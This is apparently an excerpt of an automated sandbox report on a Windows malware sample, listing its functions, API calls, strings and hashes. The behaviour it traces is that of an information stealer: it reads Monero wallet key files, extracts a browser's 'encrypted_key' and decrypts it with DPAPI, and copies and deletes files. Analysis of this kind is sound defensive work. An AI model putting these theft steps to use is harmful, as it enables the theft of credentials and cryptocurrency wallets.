                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 896b38440c6884984c25c4d8aade93c9ae919702cdb8d3c9443535245bc5ee7b
                                    • Instruction ID: 7e0c3a1068ee4e29fed40f56c5f1b8e43fb17a315d2c524e771a77982fc57d01
                                    • Opcode Fuzzy Hash: 896b38440c6884984c25c4d8aade93c9ae919702cdb8d3c9443535245bc5ee7b
                                    • Instruction Fuzzy Hash: A541E4B110079C5EDB21CB258C94BFBBBFC9F45706F1448A8ED8A86182E2719A48CF20
                                    Function 00956630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00956663
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00956726
                                    • ExitProcess.KERNEL32 ref: 00956755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: ea71e24b37a4db5fe727b8da15bbce6ce14f106e9268ec914a77fc5ca5a0a0de
                                    • Instruction ID: 54095c878abab7723015acc909d90a290c16d65af58ac58489558abf65566e66
                                    • Opcode Fuzzy Hash: ea71e24b37a4db5fe727b8da15bbce6ce14f106e9268ec914a77fc5ca5a0a0de
                                    • Instruction Fuzzy Hash: F03129B1801218AADB14EB91DC92BDEB778AF84301F404289F709671A1DF746B48CF6A
                                    Function 009587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00960E28,00000000,?), ref: 0095882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00958836
                                    • wsprintfA.USER32 ref: 00958850
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 362d2b5886ec6a11d09fc0e9e56ef44c0a111363ecca2baaff0ceab883314645
                                    • Instruction ID: ff2d7f509664025ff7a3f7da2cb32a40873dc60332b0708a585ba696c16e9c0a
                                    • Opcode Fuzzy Hash: 362d2b5886ec6a11d09fc0e9e56ef44c0a111363ecca2baaff0ceab883314645
                                    • Instruction Fuzzy Hash: 4A2112B1A40204AFEB04DFD4DD45FAEBBB8FB48711F104519FA05A7290DB79A901CBA1
                                    Function 00958D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0095951E,00000000), ref: 00958D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00958D62
                                    • wsprintfW.USER32 ref: 00958D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: a847d1f4ed9d48b49fd79e7278fd96d4a34fb56e30f45b960081b356fecac7b0
                                    • Instruction ID: e5c4a82ce885628cd06d205b52bea79ed893aab1f57038a3491b58bcd2ce009c
                                    • Opcode Fuzzy Hash: a847d1f4ed9d48b49fd79e7278fd96d4a34fb56e30f45b960081b356fecac7b0
                                    • Instruction Fuzzy Hash: 94E0ECB5A40208BBE710DB94DD4AE6977B8EB44702F004196FE0997290DE719E10DBA6
                                    Function 0094A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0094A2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0094A3FF
                                    • lstrlen.KERNEL32(00000000), ref: 0094A6BC
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0094A743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 092b64280ed10f5a96d25d1b770497417be22d4b5cd18c801ff25bbf41aa65a7
                                    • Instruction ID: 183d71b44dfe2e92c4619b46c72f55a384b0e08eb7e35c94cbdb8087206ab178
                                    • Opcode Fuzzy Hash: 092b64280ed10f5a96d25d1b770497417be22d4b5cd18c801ff25bbf41aa65a7
                                    • Instruction Fuzzy Hash: CAE1EE728101189ADB05FBA5DC92FEE7338BF94301F508259F917760A1EF346A4DCB6A
                                    Function 0094D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0094D481
                                    • lstrlen.KERNEL32(00000000), ref: 0094D698
                                    • lstrlen.KERNEL32(00000000), ref: 0094D6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0094D72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: bcbdc05d611f6e6f1567d9d87f482d2a85db6b021574f338ef89e47a47054d87
                                    • Instruction ID: d82a8655e56ada924608308451c000ce6018b3eddaef607872187acca83b5934
                                    • Opcode Fuzzy Hash: bcbdc05d611f6e6f1567d9d87f482d2a85db6b021574f338ef89e47a47054d87
                                    • Instruction Fuzzy Hash: 5091F1729101189ADB04FBA5DC96FEE7338BF94301F504259F917A70A1EF346A0DCB6A
                                    Function 0094D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0094D801
                                    • lstrlen.KERNEL32(00000000), ref: 0094D99F
                                    • lstrlen.KERNEL32(00000000), ref: 0094D9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0094DA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 8b940297ec4e46b24da43576d8f2f23fa2874f9a6f4f2b1d2856c1f028906792
                                    • Instruction ID: c20ef73a9c86daacf69c7c1ed09864c9f00c483e3d36add7cf317908e96e8921
                                    • Opcode Fuzzy Hash: 8b940297ec4e46b24da43576d8f2f23fa2874f9a6f4f2b1d2856c1f028906792
                                    • Instruction Fuzzy Hash: 1681E0729101189ADB04FBA5DC96FEE7339BF94301F504619F907A70A1EF346A0DCB6A
                                    Function 00953560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: c2a3ff3fb4317045784a6a8a3e949baac89919cff40fc52b3cc79677a475b820
                                    • Instruction ID: c1cfa15989f04bf4b8234a9d9e61ceba9167f9d22a6da72ed628857e044e629d
                                    • Opcode Fuzzy Hash: c2a3ff3fb4317045784a6a8a3e949baac89919cff40fc52b3cc79677a475b820
                                    • Instruction Fuzzy Hash: D6416271D10109EFCB04EFA5D886BEEB778BF94305F008518E91677290EB756A09CFA6
                                    Function 00949CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 009499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                      • Part of subcall function 009499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                      • Part of subcall function 009499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                      • Part of subcall function 009499C0: ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                      • Part of subcall function 009499C0: LocalFree.KERNEL32(0094148F), ref: 00949A90
                                      • Part of subcall function 009499C0: CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                      • Part of subcall function 00958E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00958E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00949D39
                                      • Part of subcall function 00949AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949AEF
                                      • Part of subcall function 00949AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00944EEE,00000000,?), ref: 00949B01
                                      • Part of subcall function 00949AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949B2A
                                      • Part of subcall function 00949AC0: LocalFree.KERNEL32(?,?,?,?,00944EEE,00000000,?), ref: 00949B3F
                                      • Part of subcall function 00949B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00949B84
                                      • Part of subcall function 00949B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00949BA3
                                      • Part of subcall function 00949B60: LocalFree.KERNEL32(?), ref: 00949BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: c44f95aee179775a7bde4cfca11c64caf5048f8e06c5b76dbbcef2e4372801de
                                    • Instruction ID: 5ebecbc820f4ae19ecf5d413d6c2f58dc40c0173e95e763228be4ab1f95f0e46
                                    • Opcode Fuzzy Hash: c44f95aee179775a7bde4cfca11c64caf5048f8e06c5b76dbbcef2e4372801de
                                    • Instruction Fuzzy Hash: 963100B5D10109ABDF14DFE4DC85FEFB7B8AB88304F144519F915A7281EB349A04CBA5
                                    Function 009592E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00953AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00953AEE,?), ref: 009592FC
                                    • GetFileSizeEx.KERNEL32(000000FF,00953AEE), ref: 00959319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00959327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
